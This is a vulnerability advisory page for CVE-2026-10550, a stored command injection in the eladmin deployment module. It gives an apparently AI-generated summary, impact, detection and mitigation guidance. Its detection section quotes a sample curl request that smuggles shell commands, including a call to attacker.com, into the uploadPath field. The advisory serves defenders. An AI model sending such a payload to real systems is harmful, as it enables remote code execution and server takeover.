CVE-2026-10550
Deferred Deferred - Pending Action
Command Injection in Eladmin Application

Publication date: 2026-06-02

Last updated on: 2026-06-02

Assigner: VulDB

Description
A weakness has been identified in elunez eladmin up to 2.7. This vulnerability affects unknown code of the file App.java of the component Application Deployment Module. This manipulation of the argument uploadPath causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-02
Last Modified
2026-06-02
Generated
2026-06-22
AI Q&A
2026-06-02
EPSS Evaluated
2026-06-21
NVD
CVE-2026-10550
EUVD
EUVD-2026-33857
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
elunez eladmin to 2.7 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Compliance Impact

The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.

Executive Summary

CVE-2026-10550 is a second-order stored command injection vulnerability in the elunez_eladmin application, affecting versions up to v2.7. It exists in the application deployment module due to insecure implementation and insufficient input validation.

Low-privileged users with app:add or app:edit permissions can bypass weak prefix validations on configuration fields such as uploadPath by injecting shell metacharacters. These malicious inputs are stored in the database and later executed with high privileges when an administrator or automated pipeline triggers deployment.

The vulnerability arises from unsafe command execution where user inputs are directly concatenated into shell commands and executed via an interactive SSH shell (ChannelShell) without proper sanitization, leading to unauthorized Remote Code Execution (RCE) and privilege escalation.

Impact Analysis

This vulnerability allows an attacker with low-level permissions to inject malicious commands that are later executed with high privileges during deployment.

The impact includes unauthorized Remote Code Execution (RCE), which can lead to full system compromise, privilege escalation, and potentially control over the affected server or environment.

Attackers can exploit this by submitting specially crafted payloads that are stored and later executed, bypassing normal security controls and potentially causing significant damage or data breaches.

Detection Guidance

This vulnerability can be detected by monitoring for suspicious POST or PUT requests to the endpoints /api/app and /api/deploy/deploy that include unusual or malicious payloads in JSON fields such as uploadPath, deployPath, backupPath, startScript, and deployScript.

Specifically, detection can focus on identifying payloads containing shell metacharacters or command injection patterns, such as newlines or command substitution sequences.

Example commands to detect exploitation attempts include searching server logs or network traffic for POST requests with suspicious payloads like:

  • curl -X POST http://<target>/api/app -H 'Content-Type: application/json' -d '{"uploadPath": "/opt/apps\nwhoami\ncurl attacker.com"}'

Additionally, monitoring for unexpected command executions triggered by deployment processes or unusual SSH ChannelShell activity may help detect exploitation.

Mitigation Strategies

Immediate mitigation steps include restricting or disabling the ability of low-privileged users to submit or edit application deployment configurations, especially fields like uploadPath, deployPath, backupPath, startScript, and deployScript.

Implement strict input validation and sanitization on these fields to prevent injection of shell metacharacters or command sequences.

Avoid direct string concatenation of user inputs into shell commands and use safer command execution methods that do not invoke a shell or properly escape inputs.

Monitor and audit deployment triggers and related SSH shell executions for suspicious activity.

If possible, apply patches or updates from the vendor once available, or consider disabling the vulnerable deployment features until a fix is released.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-10550. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart